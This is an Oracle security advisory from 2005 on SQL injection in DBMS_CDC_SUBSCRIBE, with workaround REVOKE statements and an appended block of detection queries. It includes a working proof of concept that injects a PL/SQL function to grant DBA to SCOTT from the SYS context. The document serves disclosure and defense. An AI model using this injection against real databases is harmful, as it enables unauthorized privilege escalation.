SQL Injection via Oracle DBMS_CDC_SUBSCRIBE / DBMS_CDC_ISUBSCRIBE in Oracle 9i / 10g
Details

The following proof of concept exploit code injects a custom PLSQL function. This function is executed in the SYS context and grants the DBA permission to the user SCOTT.

Workarounds

    REVOKE EXECUTE ON SYS.DBMS_CDC_SUBSCRIBE FROM PUBLIC FORCE;
    REVOKE EXECUTE ON SYS.DBMS_CDC_ISUBSCRIBE FROM PUBLIC FORCE;

Example

    -- Create a function first and inject this function.
    -- The function will be executed as user SYS.
    CREATE OR REPLACE FUNCTION "SCOTT"."ATTACK_FUNC" return varchar2
    authid current_user as
    pragma autonomous_transaction;
    BEGIN
      EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
      COMMIT;
      RETURN '';
    END;
    /

    -- Inject the function in the vulnerable procedure
    BEGIN
      SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||SCOTT.ATTACK_FUNC()||''');
    END;
    /

Patch Information

Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update April 2005.

© 2005 by Red-Database-Security GmbH - last update 02-nov-2005
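To confirm the workaround took effect and to review a database for the outcome the example describes, a DBA can run the following checks. This is an added example, not part of the original advisory; the list of accounts expected to hold DBA ('SYS', 'SYSTEM') is an assumption to be replaced with the site's approved list, and the source-text search in step 3 is a heuristic.

```sql
-- Added example: run as a user with access to the DBA_* dictionary views.

-- 1. Verify the workaround. List every grantee that can still execute the
--    two packages named in the advisory. After the REVOKE statements,
--    PUBLIC should no longer appear in the result.
SELECT grantee, owner, table_name, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name IN ('DBMS_CDC_SUBSCRIBE', 'DBMS_CDC_ISUBSCRIBE')
   AND privilege = 'EXECUTE'
 ORDER BY table_name, grantee;

-- 2. Review who holds the DBA role. The exclusion list is an assumption:
--    replace it with the accounts your site has approved as DBAs.
SELECT grantee, granted_role, admin_option, default_role
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
   AND grantee NOT IN ('SYS', 'SYSTEM')
 ORDER BY grantee;

-- 3. Heuristic hunt for stored code shaped like the advisory's example:
--    a unit outside SYS/SYSTEM that declares an autonomous transaction and
--    also issues a dynamic GRANT. The LIKE patterns match per source line,
--    so a statement split across lines can be missed; treat hits as leads.
SELECT DISTINCT s.owner, s.name, s.type
  FROM dba_source s
 WHERE s.owner NOT IN ('SYS', 'SYSTEM')
   AND UPPER(s.text) LIKE '%AUTONOMOUS_TRANSACTION%'
   AND EXISTS (SELECT 1
                 FROM dba_source g
                WHERE g.owner = s.owner
                  AND g.name  = s.name
                  AND g.type  = s.type
                  AND UPPER(g.text) LIKE '%EXECUTE IMMEDIATE%GRANT%')
 ORDER BY s.owner, s.name;
```

Any row in step 1 other than accounts that need Change Data Capture, or any unexpected grantee in step 2, warrants follow-up before the April 2005 Critical Patch Update is applied.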